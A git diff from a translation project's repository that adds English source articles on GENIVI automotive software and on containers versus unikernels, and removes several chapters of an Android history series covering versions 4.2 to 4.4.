+Regardless of someone's familiarity with the automotive software, they are welcome to join our community. People have modified cars for years, so for many people there is a natural draw to anything automotive. Software is the new domain for cars, and GENIVI wants to be the open door for anyone interested in working with automotive, open source software.
+
+-------------------------------
+via: https://opensource.com/business/16/5/interview-alison-chaiken-steven-crumb
+
+作者:[Don Watkins][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/don-watkins
+[1]: https://en.wikipedia.org/wiki/In_car_entertainment
+[2]: https://opensource.com/life/16/1/weekly-news-jan-9
+[3]: http://projects.genivi.org/smartdevicelink/home
+[4]: http://www.genivi.org/
+[5]: https://www.linkedin.com/in/stevecrumb
+[6]: http://www.genivi.org/genivi-members
+[7]: http://www.linuxfoundation.org/
+[8]: https://www.automotivelinux.org/
+[9]: https://en.wikipedia.org/wiki/Telematics
+[10]: https://www.automotivelinux.org/news/announcement/2016/01/ford-mazda-mitsubishi-motors-and-subaru-join-linux-foundation-and
+[11]: https://www.linkedin.com/in/alison-chaiken-3ba456b3
+[12]: https://www.linkedin.com/in/stevecrumb
+[13]: https://opensource.com/users/eximious
+[14]: https://en.wikipedia.org/wiki/MeeGo
+[15]: http://webinos.org/deliverable-d026-target-platform-requirements-and-ipr/automotive/
+[16]: http://she-devel.com/Chaiken_automotive_cybersecurity.pdf
+[17]: https://www.osvehicle.com/
+[18]: http://projects.genivi.org/how
+[19]: http://projects.genivi.org/
+[20]: http://genivi.org/join
+[21]: http://lists.genivi.org/mailman/listinfo/genivi-projects
diff --git a/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md b/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md
new file mode 100644
index 0000000000..a1d6257d4d
--- /dev/null
+++ b/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md
@@ -0,0 +1,51 @@
+What containers and unikernels can learn from Arduino and Raspberry Pi
+==========================================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/bus-containers.png?itok=vM7_7vs0)
+
+
+Just the other day, I was speaking with a friend who is a mechanical engineer. He works on computer assisted braking systems for semi trucks and mentioned that his company has [Arduinos][1] all over the office. The idea is to encourage people to quickly experiment with new ideas. He also mentioned that Arduinos are more expensive than printed circuits. I was surprised by his comment about price, because coming from the software side of things, my perceptions of Arduinos was that they cost less than designing a specialized circuit.
+
+I had always viewed [Arduinos][2] and [Raspberry Pi][3] as these cool, little, specialized devices that can be used to make all kinds of fun gadgets. I came from the software side of the world and have always considered Linux on x86 and x86-64 "general purpose." The truth is, Arduinos are not specialized. In fact, they are very general purpose. They are fairly small, fairly cheap, and extremely flexible—that's why they caught on like wildfire. They have all kinds of I/O ports and expansion cards. They allow a maker to go out and build something cool really quickly. They even allow companies to build new products quickly.
+
+The unit price for an Arduino is much higher than a printed circuit, but time to a minimum viable idea is much lower. With a printed circuit, the unit price can be driven much lower but the upfront capital investment is much higher. So, long story short, the answer is—it depends.
+
+### Unikernels, rump kernels, and container hosts
+
+Enter unikernels, rump kernels, and minimal Linux distributions—these operating systems are purpose-built for specific use cases. These specialized operating systems are kind of like printed circuits. They require some up-front investment in planning and design to utilize, but could provide a great performance increase when deploying a specific workload at scale.
+
+Minimal operating systems such as Red Hat Enterprise Linux Atomic or CoreOS are purpose-built to run containers. They are small, quick, easily configured at boot time, and run containers quite well. The downside is that it requires extra engineering to add third-party extensions such as monitoring agents or tools for virtualization. Some side-loaded tooling needs redesigned as super-privileged containers. This extra engineering could be worth it if you are building a big enough container environment, but might not be necessary to just try out containers.
+
+Containers provide the ability to run standard workloads (things built on [glibc][4], etc.). The advantage is that the workload artifact (Docker image) can be built and tested on your desktop and deployed in production on completely different hardware or in the cloud with confidence that it will run with the same characteristics. In the production environment, container hosts are still configured by the operations teams, but the application is controlled by the developer. This is a sort of a best of both worlds.
+
+Unikernels and rump kernels are also purpose-built, but go a step further. The entire operating system is configured at build time by the developer or architect. This has benefits and challenges.
+
+One benefit is that the developer can control a lot about how the workload will run. Theoretically, a developer could try out [different TCP stacks][5] for different performance characteristics and choose the best one. The developer can configure the IP address ahead of time or have the system configure itself at boot with DHCP. The developer can also cut out anything that is not necessary for their application. There is also the promise of increased performance because of less [context switching][6].
+
+There are also challenges with unikernels. Currently, there is a lot of tooling missing. It's much like a printed circuit world right now. A developer has to invest a lot of time and energy discerning if all of the right libraries exist, or they have to change the way their application works. There may also be challenges with how the "embedded" operating system is configured at runtime. Finally, every time a major change is made to the OS, it requires [going back to the developer][7] to change it. This is not a clean separation between development and operations, so I envision some organizational changes being necessary to truly adopt this model.
+
+### Conclusion
+
+There is a lot of interesting buzz around specialized container hosts, rump kernels, and unikernels because they hold the potential to revolutionize certain workloads (embedded, cloud, etc.). Keep your eye on this exciting, fast moving space, but cautiously.
+
+Currently, unikernels seem quite similar to building printed circuits. They require a lot of upfront investment to utilize and are very specialized, providing benefits for certain workloads. In the meantime containers are quite interesting even for conventional workloads and don't require as much investment. Typically an operations team should be able to port an application to containers, whereas it takes real re-engineering to port an application to unikernels and the industry is still not quite sure what workloads can be ported to unikernels.
+
+Here's to an exciting future of containers, rump kernels, and unikernels!
+
+--------------------------------------
+via: https://opensource.com/business/16/5/containers-unikernels-learn-arduino-raspberry-pi
+
+作者:[Scott McCarty][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/fatherlinux
+[1]: https://opensource.com/resources/what-arduino
+[2]: https://opensource.com/life/16/4/arduino-day-3-projects
+[3]: https://opensource.com/resources/what-raspberry-pi
+[4]: https://en.wikipedia.org/wiki/GNU_C_Library
+[5]: http://www.eetasia.com/ARTICLES/2001JUN/2001JUN18_NTEK_CT_AN5.PDF
+[6]: https://en.wikipedia.org/wiki/Context_switch
+[7]: http://developers.redhat.com/blog/2016/05/18/3-reasons-i-should-build-my-containerized-applications-on-rhel-and-openshift/
diff --git a/sources/talk/The history of Android/22 - The history of Android.md b/sources/talk/The history of Android/22 - The history of Android.md
deleted file mode 100644
index fab3d8c087..0000000000
--- a/sources/talk/The history of Android/22 - The history of Android.md
+++ /dev/null
@@ -1,86 +0,0 @@
-alim0x translating
-
-The history of Android
-================================================================================
-### Android 4.2, Jelly Bean—new Nexus devices, new tablet interface ###
-
-The Android Platform was rapidly maturing, and with Google hosting more and more apps in the Play Store, there was less and less that needed to go out in the OS update. Still, the relentless march of updates must continue, and in November 2012 Android 4.2 was released. 4.2 was still called "Jelly Bean," a nod to the relatively small amount of changes that were present in this release.
-
-![The LG-made Nexus 4 and Samsung-made Nexus 10.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/unnamed.jpg)
-The LG-made Nexus 4 and Samsung-made Nexus 10.
-Photo by Google/Ron Amadeo
-
-Along with Android 4.2 came two flagship devices, the Nexus 4 and the Nexus 10, both of which were sold direct by Google on the Play Store. The Nexus 4 applied the Nexus 7 strategy of a quality device at a shockingly low price and sold for $300 unlocked. The Nexus 4 had a quad-core 1.5 GHz Snapdragon S4 Pro, 2GB of RAM and a 4.7-inch 1280×768 LCD. Google's new flagship phone was manufactured by LG, and with the manufacturer switch came a focus on materials and build quality. The Nexus 4 had a glass front and back, and while you couldn't drop it, it was one of the nicest-feeling Android phones to date. The biggest downside to the Nexus 4 was the lack of LTE at a time when most phones, including the Verizon Galaxy Nexus, came with the faster modem. Still, demand for the Nexus 4 greatly exceeded Google's expectations—the launch rush crashed the Play Store Web site on launch day. The device sold out in under an hour.
-
-The Nexus 10 was Google's first 10-inch Nexus tablet. The highlight of the device was the 2560×1600 display, which was the highest resolution in its class. All those pixels were powered by a dual core, 1.7GHz Cortex A15 processor and 2GB of RAM. With each passing month, it's looking more and more like the Nexus 10 is the first and last 10-inch Nexus tablet. Usually these devices are upgraded every year, but the Nexus 10 is now 16 months old, and there's no sign of the new model on the horizon. Google is doing well with smaller-sized 7-inch tablets, and it seems content to let partners [like Samsung][1] explore the larger end of the tablet spectrum.
-
-![The new lock screen, wallpaper, and clock widget design.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/JBvsjb.jpg)
-The new lock screen, wallpaper, and clock widget design.
-Photo by Ron Amadeo
-
-4.2 brought lots of changes to the lock screen. The font was centered and used an extremely thick weight for the hour and a thin font for the minutes. The lock screen was now paginated and could be customized with widgets. Rather than a simple clock on the lock screen, users could replace it with another widget or add extra pages to the lock screen for more widgets.
-
-![The lock screen's add widget page, the list of widgets, the Gmail widget on the lock screen, and swiping over to the camera.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/locksc2reen.jpg)
-The lock screen's add widget page, the list of widgets, the Gmail widget on the lock screen, and swiping over to the camera.
-Photo by Ron Amadeo
-
-The lock screen now worked like a stripped-down version of the home screen. Page outlines would pop up on the left and right sides of the lock screen to hint to users that they could swipe to other pages with other widgets. Swiping to the left would show a simple blank page with a plus sign in the center, and tapping on it would bring up a list of widgets that were compatible with the lock screen. Lock screens were limited to one widget per page and could be expanded or collapsed by dragging up or down on the widget. The right-most page was reserved for the camera—a simple over would open the camera interface, but you weren't able to swipe back.
-
-![The new Quick Settings panel and a composite image of the app lineup.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/42fix.png)
-The new Quick Settings panel and a composite image of the app lineup.
-Photo by Ron Amadeo
-
-One of the biggest additions to 4.2 was the new "Quick Settings" panel. Android 3.0 brought a way to quickly change power settings to tablets, and 4.2 finally brought that ability to phones. A new icon was added to the top right corner of the notification panel that would switch between the normal list of notifications and the new quick settings screen. Quick Settings offered faster access to screen brightness, network connections, and battery and data usage without having to dig through the full settings screen. The top level settings button in Android 4.1 was removed, and a square was added to the Quick Settings screen for it.
-
-There were lots of changes to the app drawer and 4.2's lineup of apps and icons. Thanks to the wider aspect ratio of the Nexus 4 (5:3 vs 16:9 on the Galaxy Nexus), the app drawer on that device could now show a five-wide grid of icons. 4.2 replaced the stock browser with Google Chrome and the stock calendar with Google Calendar, both of which brought new icon designs. The Clock and Camera apps were revamped in 4.2, and new icons were part of the deal. "Google Settings" was a new app that offered shortcuts to all the existing Google Account settings around the OS, and it had a unified look with Google Search and the new Google+ icon. Google Maps got a new icon, and Google Latitude, which was part of Google Maps, was retired in favor of Google+ location.
-
-![The browser was replaced with Chrome, and the new camera interface with a full screen viewfinder.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/chroemcam.jpg)
-The browser was replaced with Chrome, and the new camera interface with a full screen viewfinder.
-Photo by Ron Amadeo
-
-The stock browser did its best Chrome imitation for a while—it took many cues from Chrome’s interface, many Chrome features, and was even using Chrome’s javascript engine—but by the time Android 4.2 rolled around, Google deemed the Android version of Chrome ready to replace the imitator. On the surface, it didn't seem like much of a difference; the interface looked different, and early versions of Chrome for Android didn't scroll as smoothly as the stock browser. Under the hood, though, everything was different. Development of Android's main browser was now handled by the Google Chrome team instead of being a side project of the Android team. Android's default browser moved from being a stagnant app tied to Android releases to a Play Store app that was continually updated. Today there is even a beta channel that receives several updates per month.
-
-The camera interface was redesigned. It was now a completely full-screen app, showing a live view of the camera and places controls on top of it. The layout aesthetic had a lot in common with the [camera design][2] of Android 1.5: minimal controls with a focus on the viewfinder output. The circle of controls in the center appeared when you either held your finger on the screen or pressed the circle icon in the bottom right corner. When holding your finger down, you could slide around to pick the options around the circle, often expanding out into a sub-menu. Releasing over a highlighted item would select it. This was clearly inspired by the Quick Controls in the Android 4.0 browser, but arranging the options in a circle meant your finger was almost always blocking part of the interface.
-
-![The clock app, which went from a two-screen app to a feature-packed, useful application.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clock-1.jpg)
-The clock app, which went from a two-screen app to a feature-packed, useful application.
-Photo by Ron Amadeo
-
-The clock application was completely revamped, going from a simple two-screen alarm clock to a world clock, alarm, timer, and stopwatch. The clock app design was like nothing Google introduced before, with an ultra-minimal aesthetic and red highlights. It seemed to be an experiment for Google. Even several versions later, this design language seemed to be confined only to this app.
-
-The clock's time picker was particularly well-designed. It showed a simple number pad, and it would intelligently disable numbers that would result in an invalid time. It was also impossible to set an alarm time without implicitly selecting AM or PM, forever solving the problem of accidentally setting an alarm for 9pm instead of 9am.
-
-![The new system UI for tablets used a stretched-out phone interface.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/tablet2.jpg)
-The new system UI for tablets used a stretched-out phone interface.
-Photo by Ron Amadeo
-
-The most controversial change in Android 4.2 was made to the tablet UI, which switched from a unified single bottom system bar to a two-bar interface with a top status bar and bottom system bar. The new design unified the phone and tablet interfaces, but critics said it was a waste of space to stretch the phone interface to a 10-inch landscape tablet. Since the navigation buttons had the whole bottom bar to themselves now, they were centered, just like the phone interface.
-
-![Multiple users on a tablet, and the new gesture-driven keyboard.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-06-14.55.png)
-Multiple users on a tablet, and the new gesture-driven keyboard.
-Photo by Ron Amadeo
-
-On tablets, Android 4.2 brought support for multiple users. In the settings, a "Users" section was added, where you could manage users on a device. Setup was done from within each user account, where Android would keep separate settings, home screens, apps, and app data for each user.
-
-4.2 also added a new keyboard with swiping abilities. Rather than just tapping each individual letter, users could now keep a finger on the screen the whole time and just slide from letter to letter to type.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/22/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2014/01/hands-on-with-samsungs-notepro-and-tabpro-new-screen-sizes-and-magazine-ui/
-[2]:http://cdn.arstechnica.net/wp-content/uploads/2013/12/device-2013-12-26-11016071.png
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
diff --git a/sources/talk/The history of Android/23 - The history of Android.md b/sources/talk/The history of Android/23 - The history of Android.md
deleted file mode 100644
index e67dff87e6..0000000000
--- a/sources/talk/The history of Android/23 - The history of Android.md
+++ /dev/null
@@ -1,59 +0,0 @@
-The history of Android
-================================================================================
-![Another Play Store redesign! This one is very close to the current design and uses cards that make layout changes a piece of cake.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/get-em-Kirill.jpg)
-Another Play Store redesign! This one is very close to the current design and uses cards that make layout changes a piece of cake.
-Photo by Ron Amadeo
-
-### Out-of-cycle updates—who needs a new OS? ###
-
-In between Android 4.2 and 4.3, Google went on an out-of-cycle update tear and showed just how much Android could be improved without having to fire up the arduous OTA update process. Thanks to the [Google Play Store and Play Services][1], all of these updates were able to be delivered without updating any core system components.
-
-In April 2013, Google released a major redesign to the Google Play Store. Like most redesigns from here on out, the new Play Store fully adopted the Google Now aesthetic, with white cards on a gray background. The action bar changed color based on the current content section, and since the first screen featured content from all sections of the store, the action bar was a neutral gray. Buttons to navigate to the content sections were now given top billing, and below that was usually a promotional block or rows of recommended apps.
-
-In April 2013, Google released a major redesign to the Google Play Store. Like most redesigns from here on out, the new Play Store fully adopted the Google Now aesthetic, with white cards on a gray background. The action bar changed color based on the current content section, and since the first screen featured content from all sections of the store, the action bar was a neutral gray. Buttons to navigate to the content sections were now given top billing, and below that was usually a promotional block or rows of recommended apps.
-
-![The individual content sections are beautifully color-coded.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/content-rainbow.jpg)
-The individual content sections are beautifully color-coded.
-Photo by Ron Amadeo
-
-The new Play Store showed off the real power of Google’s card design language, which enabled a fully responsive layout across all screen sizes. One large card could be stuck next to several little cards, larger-screened devices could show more cards, and rather than stretch things in horizontal mode, more cards could just be added to a row. The Play Store content editors were free to play with the layout of the cards, too; a big release that needed to be highlighted could get a larger card. This design would eventually trickle down to the other Google Play content apps, finally resulting in a unified design.
-
-![Hangouts replaced Google Talk and is now continually developed by the Google+ team.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/talkvhangouts2.jpg)
-Hangouts replaced Google Talk and is now continually developed by the Google+ team.
-Photo by Ron Amadeo
-
-Google I/O, the company's annual developer conference, was usually where a new Android version was announced. But at the 2013 edition, Google made just as many improvements without having to update the OS.
-
-One of the biggest things announced at the show was an update to Google Talk, Google's instant messaging platform. For a long time, Google shipped four text communication apps for Android: Google Talk, Google+ Messenger, Messaging (the SMS app), and Google Voice. Having four apps that accomplished the same task—sending a text message to someone—was very confusing for users. At I/O, Google killed Google Talk and started their messaging product over from scratch, creating [Google Hangouts][2]. While initially it only replaced Google Talk, the plan for Hangouts was to unify all of Google's various messaging apps into a single interface.
-
-The layout of the Hangouts UI really wasn't drastically different from Google Talk. The main page contained your open conversations, and tapping on one opened a chat page. The design was updated, the chat page now used a card-style display for each paragraph, and the chat list was now a "drawer"-style interface, meaning you could open it with a horizontal swipe. Hangouts had read receipts and a typing status indicator, and group chat was now a primary feature.
-
-Google+ was the center of Hangouts now, so much so that the full name of the product was actually "Google+ Hangouts." Hangouts was completely integrated with the Google+ desktop site so that video and chats could be made from one to the other. Identity and avatars were pulled from Google+, and tapping on an avatar would open that person's Google+ profile. And much like the change from Browser to Google Chrome, core Android functionality was passed off to a separate team—the Google+ team—as opposed to being a side product of the very busy Android engineers. With the Google+ takeover, Android's main IM client now became a continually developed application. It was placed into the Play Store and received fairly regular updates.
-
-![The new navigation drawer interface.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/navigation_drawer_overview1.png)
-The new navigation drawer interface.
-Photo by [developer.android.com][3]
-
-Google also introduced a new design element for the action bar: the navigation drawer. This drawer was shown as a set of three lines next to the app icon in the top-right corner. By tapping on it or dragging from the edge of the screen to the right, a side-mounted menu would appear. As the name implies, this was used to navigate around the app, and it would show several top-level locations within the app. This allowed the first screen to show content, and it gave users a consistent, easy-to-access place for navigation elements. The nav drawer was basically a super-sized version of the normal menu, scrollable and docked to the right side.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/23/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2013/09/balky-carriers-and-slow-oems-step-aside-google-is-defragging-android/
-[2]:http://arstechnica.com/information-technology/2013/05/hands-on-with-hangouts-googles-new-text-and-video-chat-architecture/
-[3]:https://developer.android.com/design/patterns/navigation-drawer.html
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/24 - The history of Android.md b/sources/talk/The history of Android/24 - The history of Android.md
deleted file mode 100644
index b95ceb29c7..0000000000
--- a/sources/talk/The history of Android/24 - The history of Android.md
+++ /dev/null
@@ -1,82 +0,0 @@
-The history of Android
-================================================================================
-![The slick new Google Play Music app, which changed from Tron to a perfect match for the Play Store.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/Goooogleplaymusic.jpg)
-The slick new Google Play Music app, which changed from Tron to a perfect match for the Play Store.
-Photo by Ron Amadeo
-
-Another app update pushed out at I/O was a new Google Music app. The app was completely redesigned, finally doing away with the blue-on-blue design introduced in Honeycomb. Play Music's design was unified with the new Play Store released a few months earlier, with a responsive white card layout. Music was also one of the first major apps to take advantage of the new navigation drawer style. Along with the new app, Google launched Google Play Music All Access, an all-you-can-eat subscription service for $10 a month. Google Music now had a subscription plan, à la carte purchasing, and a cloud music locker. This version also introduced "Instant Mix," a mode where Google would cloud-compute a playlist of similar songs.
-
-![A game showing support for Google Play Games. This lineup shows the Play Store game feature descriptions, the permissions box triggered by signing into the game, a Play Games notification, and the achievements screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/gooooogleplaygames.jpg)
-A game showing support for Google Play Games. This lineup shows the Play Store game feature descriptions, the permissions box triggered by signing into the game, a Play Games notification, and the achievements screen.
-Photo by Ron Amadeo
-
-Google also introduced "Google Play Games," a back-end service that developers could plug into their games. The service was basically an Android version of Xbox Live or Apple's Game Center. Developers could build Play Games support into their game, which would easily let them integrate achievements, leaderboards, multiplayer, matchmaking, user accounts, and cloud saves by using Google's back-end services.
-
-Play Games was the start of Google's big push into gaming. Just like standalone GPS units, flip phones, and MP3 players, smartphone makers were hoping standalone gaming devices would be turned into nothing more than a smartphone feature bullet point. Why buy a Nintendo DS or PS Vita when you had a smartphone with you? An easy-to-use multiplayer service would be a big part of this, and we've still yet to see the final consequence of this move. Today, Google and Apple are both rumored to be planning living room gaming devices.
-
-![Google Keep, Google's first note taking service since Google Notebook.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/goooglekeep.jpg)
-Google Keep, Google's first note taking service since Google Notebook.
-Photo by Ron Amadeo
-
-It was clear some products were developed in time for presentation at Google I/O, [but the three-and-a-half hour keynote][1] was already so massive, some things were cut from being announced. Once the smoke cleared three days after Google I/O, Google introduced Google Keep, a note taking app for Android and the Web. Keep was a fairly straightforward affair, applying the responsive Google Now-style design to a note taking app. Users could change the size of the cards from a multi-column layout to a single column view. Notes could consist of plain text, checklists, voice note with automatic transcription, or pictures. Note cards could be dragged around and rearranged on the main screen, and you could even assign a color to a note.
-
-![Gmail 4.5, which switched to the new navigation drawer design and merged the action bars, thanks to some clever button elimination.](http://cdn.arstechnica.net/wp-content/uploads/2014/05/gmail.png)
-Gmail 4.5, which switched to the new navigation drawer design and merged the action bars, thanks to some clever button elimination.
-Photo by Ron Amadeo
-
-After I/O, not much was safe from Google's out-of-cycle updating. In June 2013, Google released a redesigned version of Gmail. The headline feature of the new design was the new navigation drawer interface that was introduced a month earlier at Google I/O. The most eye catching change was the addition of Google+ profile pictures instead of checkboxes. While the checkboxes were visibly removed, they were still there, just tap on a picture.
-
-![The new Google Maps, which switched to an all-white Google Now-style theme.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps11.png.)
-The new Google Maps, which switched to an all-white Google Now-style theme.
-Photo by Ron Amadeo
-
-One month later, Google released a completely overhauled version of Google Maps to the Play Store. It was the first ground-up redesign of Google Maps since Ice Cream Sandwich. The new version fully adopted the Google Now white card aesthetic, and it greatly reduced the amount of stuff on the screen. The new Google Maps seemed to have a design mandate to always show a map on the screen somewhere, as you’ll be hard pressed to find something other than the settings that fully covers the map.
-
-This version of Google Maps seemed to live in its own little design world. The white search bar “floated" above the map, with maps showing on the sides and top of the bar. That didn't really make it seem like the traditional Action Bar design. The navigation drawer, in the top left on every other app, was in the bottom left. There was no up button, app icon, or overflow button on the main screen.
-
-![The new Google Maps cut a lot of fat and displayed more information on a single screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps21.png)
-The new Google Maps cut a lot of fat and displayed more information on a single screen.
-Photo by Ron Amadeo
-
-The left picture shows what popped up when you tapped on the search bar (along with the keyboard, which had been closed). In the past, Google would show an empty page below a blank search bar, but in Maps, Google used that space to link to the new “Local" page. The “blank" search results displayed links to common, browsable results like restaurant listings, gas stations, and attractions. At the bottom of the results page was a list of nearby results from your search history and an option to manually cache parts of the map.
-
-The right set of images shows location page. The map shown in the top of the Maps 7 screenshot isn’t a thumbnail; that’s the full map view. In the new version of Google Maps, a location was displayed as a card that “floats" overtop of the main map, and the map was repositioned to center on the location. Scrolling up would move the card up and cover the map, and scrolling down would show the whole map with the result reduced to a small strip at the bottom. If the location was part of a list of search results, swiping left and right would move through the results.
-
-The location pages were redesigned to be much more useful at a glance. On the first page, the new version added critical information, like the location on a map, the review score, and the number of reviews. Since this is a phone, and the software will be dialing for you, the phone number was deemed pointless and was removed. The old version showed the distance to the location in miles, while the new version of Google Maps showed the distance in terms of time, based on traffic and preferred mode of transportation—a much more useful metric. The new version also put a share button front and center, which made coordination over IM or text messaging a lot easier.
-
-### Android 4.3, Jelly Bean—getting wearable support out early ###
-
-Android 4.3 would have been an incredible update if Google had done the traditional thing and not released updates between 4.3 and 4.2 through the Play Store. If the new Play Store, Gmail, Maps, Books, Music, Hangouts, Keep, and Play Games were bundled into a big brick as a new version of Android, it would have been hailed as the biggest release ever. Google didn't need to do hold back features anymore though. With very little left that required an OS update, at the end of July 2013, Google released the seemingly insignificant update called "Android 4.3."
-
-![Android Wear plugging into Android 4.3's Notification access screen.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-28-12.231.jpg)
-Android Wear plugging into Android 4.3's Notification access screen.
-Photo by Ron Amadeo
-
-Google made no qualms about the low importance of 4.3, calling the newest release "Jelly Bean" (the third one in a row). Android 4.3's feature list read like a laundry list of things Google couldn't update from the Play Store or through Google Play Services, mostly consisting of low-level framework changes for developers.
-
-Many of the additions seemed to fit a singular purpose, though—Android 4.3 was Google's trojan horse for wearable computing support. 4.3 added support for Bluetooth Low Energy, a way to wirelessly connect Android to another device and pass data back and forth while using a very small amount of power—an integral feature to a wearable device. Android 4.3 also added a "Notification Access" API, which allowed apps to completely replicate and control the notification panel. Apps could display notification text and pictures and interact with the notification the same way users do—namely pressing action buttons and dismissing notifications. Doing this from an on-board app when you have the notification panel is useless, but on a device that is separate from your phone, replicating the information in the notification panel becomes much more useful. One of the few apps that plugged into this was "Android Wear Preview," which used the notification API to power most of the interface for Android Wear.
-
-The "4.3 is for wearables" theory explained the relatively low number of features in 4.3: it was pushed out the door to give OEMs time to update devices in time for the launch of [Android Wear][2]. The plan seems to have worked. Android Wear requires Android 4.3 and up, which has been out for so long now that most major flagships have updated.
-
-Android 4.3 was not all that exciting, but Android releases from here on out didn't need to be all that exciting. Everything became so modularized that Google could push updates out as soon as they were done through Google Play, rather than drop everything in one huge brick as an OS update.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/24/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://live.arstechnica.com/liveblog-google-io-2013-keynote/
-[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/25 - The history of Android.md b/sources/talk/The history of Android/25 - The history of Android.md
deleted file mode 100644
index 39eeb55768..0000000000
--- a/sources/talk/The history of Android/25 - The history of Android.md
+++ /dev/null
@@ -1,70 +0,0 @@
-The history of Android
-================================================================================
-![The LG-made Nexus 5, the launch device for KitKat.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nexus56.jpg)
-The LG-made Nexus 5, the launch device for KitKat.
-
-Android 4.4, KitKat—more polish; less memory usage
-
-Google got really cute with the launch of Android 4.4. The company [teamed up with Nestlé][1] to name the OS "KitKat," and it launched on Halloween, October 31, 2013. Nestlé produced limited-edition Android-shaped KitKat bars, and KitKat packaging in stores promoted the new OS while offering a chance to win a Nexus 7.
-
-KitKat launched with a new Nexus device, the Nexus 5. The new flagship had the biggest display yet: a five-inch, 1920x1080 LCD. Despite the bigger screen size, LG—again the manufacturer for the device—was able to fit the Nexus 5 into the same dimensions as a Galaxy Nexus or Nexus 4.
-
-The Nexus 5 was specced comparatively to the highest-end phones at the time, with a 2.3Ghz Snapdragon 800 processor and 2GB of RAM. The phone was again sold unlocked on the Play Store, but while most phones with specs like this would go for $600-$700, Google sold the Nexus 5 for only $350.
-
-One of the most important improvements in KitKat was one you couldn't see: significantly lower memory usage. For KitKat, Google started a concerted effort to lower memory usage across the OS and bundled apps called "Project Svelte." After tons of optimization work and a "low memory" mode that disabled expensive graphical effects, Android could now run on as little as 340MB of RAM. Lower memory requirements were a big deal, because devices in the developing world—the biggest growth markets for smartphones—often ran on only 512MB of RAM. Ice Cream Sandwich's more advanced UI significantly raised the system requirements of Android devices, which left many low-end devices—even newly released low-end devices—stuck on Gingerbread. The lower system requirements of KitKat meant to bring these cheap devices back into the fold. With KitKat, Google hoped to finally kill Gingerbread (which, at the time of writing, is around 20 percent of the market). Just in case the lower system requirements weren't enough, there have even been reports that Google will [no longer license][2] the Google apps to Gingerbread devices.
-
-Besides bringing low-end phones to a modern version of the OS, Project Svelte's lower memory requirements were to be a boon to wearable computers, too. Google Glass [announced][3] it was also switching to the slimmer OS, and [Android Wear][4] ran on KitKat, too. The lower memory requirements in Android 4.4 and the notification API and Bluetooth LE support in 4.3 came together nicely to support wearable computing.
-
